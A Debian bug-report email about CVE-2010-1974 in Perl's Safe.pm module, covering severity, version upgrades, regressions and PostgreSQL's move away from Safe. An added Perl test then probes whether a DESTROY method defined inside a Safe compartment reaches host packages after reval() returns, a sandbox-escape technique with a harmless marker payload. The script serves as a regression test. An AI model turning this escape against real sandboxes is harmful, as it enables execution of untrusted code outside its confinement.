forcemerge 582978 582806
thanks

On Mon, May 24, 2010 at 08:36:39PM -0400, Michael Gilbert wrote:

> Package: perl
> Version: 5.10.1-12
> Severity: serious
> Tags: security

I'm not totally convinced about the severity but let's leave it at
'serious' for now.

> The following CVE (Common Vulnerabilities & Exposures) id was
> published for perl.
>
> CVE-2010-1974[0]:
> | Multiple unspecified vulnerabilities in the Safe (aka Safe.pm) module
> | before 2.25 for Perl allow context-dependent attackers to inject and
> | execute arbitrary code via vectors related to "automagic methods."
> | NOTE: this might overlap CVE-2010-1169 or CVE-2010-1447.

> The current version of perl in unstable has safe.pm 2.18, so that just
> needs to be updated to version 2.25.

If this is indeed considered 'serious', we need targeted fixes for a
stable update as well. I'm rather concerned about possible regressions.

I'm currently trying to come up with some test cases so that I could
understand the risks better. Help would be welcome. I wasn't
particularly well acquainted with Safe before this.

Upstream is now at 2.27, which has further related changes and was also
bundled with Perl 5.12.1. However, it causes regressions in (at least)
libpetal-perl (#582805) and libtext-micromason-perl (#582892). These two
regressions don't happen with 2.25.

PostgreSQL has in the past used Safe.pm for its PL/perl extension, but
recently moved away from it, apparently due to CVE-2010-1169. Quoting
HISTORY in postgresql-8.4 (8.4.4-1):

  Recent developments have convinced us that "Safe.pm" is too insecure
  to rely on for making plperl trustable.

FWIW, there seems to be a general agreement that Safe.pm is a "failed
experiment".

http://www.nntp.perl.org/group/perl.perl5.porters/2010/03/msg158034.html
http://www.nntp.perl.org/group/perl.perl5.porters/2010/04/msg159471.html

-- 
Niko Tyni   nt...@debian.org
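An added test case for the kind of "automagic method" behaviour the CVE text refers to. This is not part of the bug report, of Debian's perl package, or of Safe.pm's own test suite, and the package names Outside and Hook, the marker sub and the $marker_called flag are invented for the test. It assumes one reading of "automagic methods": Safe compiles untrusted code with a restricted opcode set and with the compartment's root namespace standing in for main::, but DESTROY is invoked by the interpreter when the returned object is freed, which happens after reval() has returned. Since Perl resolves class names in method calls at run time, a DESTROY compiled inside the compartment may then see the host's packages. The script reports what happens, so it can be run against the 2.18 and 2.25 versions discussed above and the results compared:

```perl
#!/usr/bin/perl
# Added example (constructed test case, not from the bug report).
# Question tested: does a DESTROY method compiled inside a Safe compartment
# run with the host's namespace visible once reval() has returned?
use strict;
use warnings;
use Safe;

# Flag that only host-side code can set (name is invented for this test).
our $marker_called = 0;

# Host-side package. From inside the compartment, "Outside" resolves to
# Safe::Root0::Outside (which does not exist), so this sub is reachable
# only by code that runs after the compartment's namespace swap is undone.
package Outside;
sub marker { $main::marker_called = 1; return 'host side' }
package main;

# Untrusted code (constructed). Everything here is in the :default opset;
# the class name in "Outside->marker" is looked up by name at run time.
my $untrusted = <<'EOT';
package Hook;
sub DESTROY { Outside->marker }
bless {}, 'Hook';
EOT

sub run_test {
    my $cpt = Safe->new;
    my $ret = $cpt->reval($untrusted);
    die "reval failed: $@" if $@;

    # Object still alive: DESTROY has not run yet.
    my $before = $main::marker_called;

    # Sanity check of the namespace swap: a direct call from inside the
    # compartment must fail, because Outside:: is not visible there.
    $cpt->reval('Outside->marker');
    my $direct_blocked = $@ ? 1 : 0;

    undef $ret;    # drops the last reference; Hook::DESTROY runs here, outside reval()
    my $after = $main::marker_called;

    return {
        before         => $before,
        direct_blocked => $direct_blocked,
        after          => $after,
    };
}

my $r = run_test();
printf "Safe.pm version: %s\n", $Safe::VERSION;
printf "marker before undef: %d  direct call blocked: %d  marker after undef: %d\n",
    $r->{before}, $r->{direct_blocked}, $r->{after};
print $r->{after}
    ? "DESTROY reached a package that was invisible from inside the compartment\n"
    : "DESTROY did not reach the host namespace\n";
```

A result of `direct call blocked: 1` together with `marker after undef: 1` means the compartment's namespace restriction held while reval() was running but not for the DESTROY invoked afterwards. This only exercises name resolution, not the opcode mask (the DESTROY body is still compiled under the mask), and it says nothing about what 2.25 or 2.27 changed; that is exactly what comparing runs against the two versions is meant to show.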